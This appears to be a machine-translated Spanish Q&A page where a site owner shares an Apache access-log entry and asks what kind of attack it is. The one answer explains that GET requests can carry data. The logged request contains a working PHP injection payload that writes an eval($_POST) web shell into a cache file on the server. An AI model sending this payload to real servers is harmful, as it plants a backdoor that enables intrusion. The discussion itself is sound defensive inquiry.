¿Puede Hacker publicar datos a través de la solicitud GET?

3

Hoy hemos recibido la siguiente solicitud en el archivo de registros de acceso de Apache.

"GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7C%3C-'; HTTP/1.1" 200 42303

Como se ve claramente en la URL de la solicitud anterior, el pirata informático intenta intentar POST los datos o el archivo a través de la solicitud GET y, sorprendentemente, tiene 200 Código de estado en estado de respuesta.

¿Qué tipo de intento de piratería es?

Nota: - Por razones de seguridad, hemos bloqueado todas las solicitudes POST, excepto la URL de algunos formularios en nuestro servidor.

Por lo tanto, cualquier pirata informático que esté intentando publicar algunos datos maliciosos en nuestro servidor obtendrá 403 Código de estado en Respuesta

sobre el pirata informático PUBLICADO Algunos datos a través de la Solicitud GET y él tiene 200 Código de estado en Respuesta.

Por favor, ayúdame a saber qué tipo de técnica de pirateo es esto.

    
pregunta Pawan Patil 04.08.2017 - 07:06
fuente

1 respuesta

3

El hacker no PUBLICA los datos. POST es un método HTTP tanto como GET, HEAD, OPTIONS y similares. Al contrario de GET, el método POST puede tener un cuerpo de solicitud para transferir los datos. Sin embargo, también es posible transferir datos dentro de una solicitud GET, por ejemplo dentro de la cadena de consulta de la URL (es decir, la parte que comienza con ? ) como se ve en los registros. No hay nada especial en ello y, de hecho, esta es la forma en que se transfieren los datos si utiliza un formulario HTML y no especifica explícitamente un método.
Y como este es un comportamiento normal, el servidor devolverá un código de respuesta exitoso.

    
respondido por el Steffen Ullrich 04.08.2017 - 07:41
fuente

Lea otras preguntas en las etiquetas